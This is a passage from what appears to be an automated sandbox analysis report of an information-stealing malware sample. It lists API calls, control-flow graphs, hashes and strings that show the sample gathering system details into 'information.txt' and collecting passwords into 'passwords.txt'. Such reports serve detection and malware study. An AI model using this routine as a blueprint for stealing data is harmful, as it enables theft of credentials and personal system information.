                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: RegOpenKeyExA.KERNEL32(80000002,0156B410,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: RegQueryValueExA.KERNEL32(00000000,01571D80,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetSystemInfo.KERNEL32(00000000), ref: 0041054D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410563
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410747
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004107D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,01566098,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,01572148,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,015720B8,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,0042751C,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416407
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1864629043-4117839003
                                                                                                                                                                                                                                                                                                  • Opcode ID: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0cc808f1cb2f816238a06d44e6270940a99662192b5bc88e36d74afc34faa58
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D923F71805149EACB15E7E1C952AEEBBB85F25304F5040BEA602735D2DF7C2B4CCAB9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040CF10 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 312stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040CFC9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D026
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040D02D
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0040D0DA
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F758), ref: 0040D0F4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D107
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A58), ref: 0040D116
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D129
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A5C), ref: 0040D138
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F828), ref: 0040D149
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D15C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A60), ref: 0040D16B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F7E8), ref: 0040D17B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D18E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A64), ref: 0040D19D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,01571FE0), ref: 0040D1AE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D1C1
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A68), ref: 0040D1D0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A6C), ref: 0040D1DF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 0040D217
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D269
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D299
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 998505060-347816968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 63851fc3274498d7ace03ef38f0d11ae2fd2b8d34633411e4d20ec60dba1fe74
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3C18F74D00218EBCB14EBE4DC45AEEBB79BF19304F10452DF612B3291DB786A09CB65
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00414330 Relevance: 39.7, APIs: 11, Strings: 11, Instructions: 1203sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1907 414330-414415 call 40fe10 * 3 call 40feb0 * 3 call 40fe20 * 6 1932 414418-41441f call 402760 1907->1932 1935 414425-414541 call 402480 call 40ff00 call 40fea0 call 4024e0 call 40fe60 * 5 call 413a40 call 40ff00 1932->1935 1936 414546-414640 call 402480 call 4024b0 call 40fe60 * 3 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 1932->1936 1987 4146b7-4146ba call 40fea0 1935->1987 1974 414642-414699 call 4024e0 call 40fe60 * 2 call 401120 call 413a40 1936->1974 1975 4146bf-4146d5 call 4100c0 StrCmpCA 1936->1975 2015 41469e-4146b1 call 40ff00 1974->2015 1983 4152a6-4153ac call 40ff00 call 4024e0 call 40ff00 call 40fea0 call 402770 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 1975->1983 1984 4146db-4146e2 call 402750 1975->1984 2353 4153b0-4153d6 call 40fea0 * 2 1983->2353 1994 414892-4148a8 call 4100c0 StrCmpCA 1984->1994 1995 4146e8-4146ef call 402760 1984->1995 1987->1975 2010 415197-4152a1 call 40ff00 call 402570 call 40ff00 call 40fea0 call 4027a0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 1994->2010 2011 4148ae-4148b5 call 402760 1994->2011 2007 4146f5-414791 call 402510 call 40ff00 call 40fea0 call 402570 call 40fe60 call 402510 call 401120 call 413a40 call 40ff00 1995->2007 2008 414796-414813 call 402510 call 402540 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 1995->2008 2180 41488a-41488d call 40fea0 2007->2180 2008->1994 2132 414815-414884 call 402570 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2008->2132 2010->2353 2029 414a7b-414a94 call 4100c0 StrCmpCA 2011->2029 2030 4148bb-4148c2 call 402760 2011->2030 2015->1987 2043 415085-415192 call 40ff00 call 402600 call 40ff00 call 40fea0 call 4027d0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2029->2043 2044 414a9a-414aa1 call 402760 2029->2044 2049 4148c8-41496a call 4025a0 call 40ff00 call 40fea0 call 402600 call 40fe60 call 4025a0 call 401120 call 413a40 call 40ff00 2030->2049 2050 41496f-4149f2 call 4025a0 call 4025d0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2030->2050 2043->2353 2070 414c51-414c67 call 4100c0 StrCmpCA 2044->2070 2071 414aa7-414aae call 402760 2044->2071 2252 414a73-414a76 call 40fea0 2049->2252 2050->2029 2207 4149f8-414a6d call 402600 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2050->2207 2100 414f70-415080 call 40ff00 call 402690 call 40ff00 call 40fea0 call 402800 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2070->2100 2101 414c6d-414c74 call 402760 2070->2101 2098 414b55-414bd2 call 402630 call 402660 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2071->2098 2099 414ab4-414b50 call 402630 call 40ff00 call 40fea0 call 402690 call 40fe60 call 402630 call 401120 call 413a40 call 40ff00 2071->2099 2098->2070 2277 414bd4-414c43 call 402690 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2098->2277 2325 414c49-414c4c call 40fea0 2099->2325 2100->2353 2137 414e30-414e46 call 4100c0 StrCmpCA 2101->2137 2138 414c7a-414c81 call 402760 2101->2138 2132->2180 2171 414e58-414f6b call 40ff00 call 402720 call 40ff00 call 40fea0 call 402830 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2137->2171 2172 414e48-414e53 Sleep 2137->2172 2164 414c87-414d29 call 4026c0 call 40ff00 call 40fea0 call 402720 call 40fe60 call 4026c0 call 401120 call 413a40 call 40ff00 2138->2164 2165 414d2e-414db1 call 4026c0 call 4026f0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2138->2165 2374 414e28-414e2b call 40fea0 2164->2374 2165->2137 2337 414db3-414e25 call 402720 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2165->2337 2171->2353 2172->1932 2180->1994 2207->2252 2252->2029 2277->2325 2325->2070 2337->2374 2374->2137
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414638
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413A40: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004146CD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041480B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148A0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004149EA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414A8C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414BCA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414C5F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DA9
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3E
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00414E4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                                                  • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                                                                  • Opcode ID: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a2bbd2f173dbc1054a30c93a0a01a9f01b5700f65783502aefbb1eff031eee4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AB28470C01248EACB14EBB5C9566DDBBB86F15308F5480BEE945736C2DB78670CCBA6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00416548 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 215stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2692 416548-41654f 2693 416550-416564 StrCmpCA 2692->2693 2694 416867-41687a FindNextFileA 2693->2694 2695 41656a-41657e StrCmpCA 2693->2695 2694->2693 2697 416880-416899 FindClose call 40fea0 2694->2697 2695->2694 2696 416584-4165b5 wsprintfA StrCmpCA 2695->2696 2698 4165e0-4165fd wsprintfA 2696->2698 2699 4165b7-4165de wsprintfA 2696->2699 2705 41689d-4168c4 call 40fea0 * 2 2697->2705 2701 416600-416640 memset lstrcat strtok_s 2698->2701 2699->2701 2703 416642-416653 2701->2703 2704 41666f-4166ac memset lstrcat strtok_s 2701->2704 2707 416801-416809 2703->2707 2714 416659-41666d strtok_s 2703->2714 2704->2707 2708 4166b2-4166c2 PathMatchSpecA 2704->2708 2707->2694 2711 41680b-416819 2707->2711 2712 416754-416768 strtok_s 2708->2712 2713 4166c8-416752 call 411450 wsprintfA call 40fea0 call 4118d0 call 419670 2708->2713 2711->2697 2717 41681b-416823 2711->2717 2712->2708 2716 41676e 2712->2716 2713->2712 2734 416773-41677e 2713->2734 2714->2703 2714->2704 2716->2707 2717->2694 2720 416825-416861 call 401120 call 4164a0 2717->2720 2720->2694 2735 4168c5-4168d8 call 40fea0 2734->2735 2736 416784-4167aa call 40fe20 call 406e80 2734->2736 2735->2705 2743 4167f4-4167fa 2736->2743 2744 4167ac-4167ef call 40fe20 call 401120 call 4153e0 call 40fea0 2736->2744 2743->2707 2744->2743
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00427618,?,?,?,?,?,?,?,00416AC2,?), ref: 0041655C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042761C,?,?,?,?,?,?,?,00416AC2,?), ref: 00416576
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041659B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00427343,?,?,?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 004165AD
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004165D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004118D0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004118D0: CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004165F7
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041660D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416620
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00416636
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00416663
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041667C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041668C
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004166A2
                                                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004166BA
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004166FD
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041674B
